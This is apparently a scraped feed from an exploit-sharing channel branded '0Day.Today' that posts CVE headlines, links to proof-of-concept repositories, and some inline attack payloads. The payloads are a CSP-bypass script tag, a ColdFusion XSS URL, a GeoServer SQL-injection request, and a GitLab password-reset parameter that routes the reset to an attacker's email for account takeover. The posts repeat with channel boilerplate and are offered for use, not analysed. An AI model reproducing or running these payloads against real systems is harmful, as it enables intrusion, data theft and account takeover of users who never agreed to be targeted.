CVE-2023-25136 ( OpenSSH Pre-Auth Double Free CVE-2023-25136 POC )
Github
#CVE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-27524 ( Apache Superset Auth Bypass )
Exploit
#CVE #Exploit #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
Exploit
#CVE #Exploit #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
You can bypass CSP on any website that allows http://microsoft.com in a script-src
PoC:
octagon.net
#BugBounty #bypass #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
PoC:
<script src=http://microsoft.com/en-us/research/wp-json?_jsonp=alert></script>
This works because of the WordPress CSP bypass our engineer (octagon) found last year : octagon.net
#BugBounty #bypass #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-0386 - PoC Exploit Released for Linux Kernel Privilege Escalation
Link
Exploit
#POC #exploit #linux
——————
0Day.Today
@LearnExploit
@Tech_Army
Link
Exploit
#POC #exploit #linux
——————
0Day.Today
@LearnExploit
@Tech_Army
ColdFusion Debug XSS
POC: {{host}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(document.domain)
#POC #CVE #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
POC: {{host}}/CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(document.domain)
#POC #CVE #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-38831
WinRAR 6.22 code execution PoC
Github
#exploit #CVE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
WinRAR 6.22 code execution PoC
Github
#exploit #CVE #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-30547 - PoC Exploit for VM2 Sandbox Escape Vulnerability
Github
#cve #poc #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#cve #poc #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - rvizx/CVE-2023-30547: PoC Exploit for VM2 Sandbox Escape Vulnerability
PoC Exploit for VM2 Sandbox Escape Vulnerability. Contribute to rvizx/CVE-2023-30547 development by creating an account on GitHub.
PoC for CVE-2023-50164 - Proof of Concept for Path Traversal in Apache Struts
Github
#POC #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#POC #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - dwisiswant0/cve-2023-50164-poc: Proof of Concept for Path Traversal in Apache Struts ("CVE-2023-50164")
Proof of Concept for Path Traversal in Apache Struts ("CVE-2023-50164") - dwisiswant0/cve-2023-50164-poc
CVE-2023-50254 PoC Exploit for Deepin-reader RCE
POC
Read
#CVE #POC #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
POC
Read
#CVE #POC #Exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-25157
#CVE #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
GET /geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeNamosloe=gwpd:chinamap11&CQL_FILTER=strStartsWith%28Vatican City%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+INTEGER%29%29+--+%27%29+%3D+true HTTP/1.1
#CVE #Poc
——————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
CVE-2023-27524 ( Apache Superset Auth Bypass ) Exploit #CVE #Exploit #POC —————— 0Day.Today @LearnExploit @Tech_Army
CVE-2023-27524 - Apache Superset Auth Bypass and RCE
Github
#CVE #Exploit #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #Exploit #POC
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-7028 - GitLab CE/EE Account Takeover via Password Reset without user interactions
Poc:
#CVE #POC
————
0Day.Today
@LearnExploit
@Tech_Army
Poc:
user[email][]=valid@email.com&user[email][]=attacker@email.com
#CVE #POC
————
0Day.Today
@LearnExploit
@Tech_Army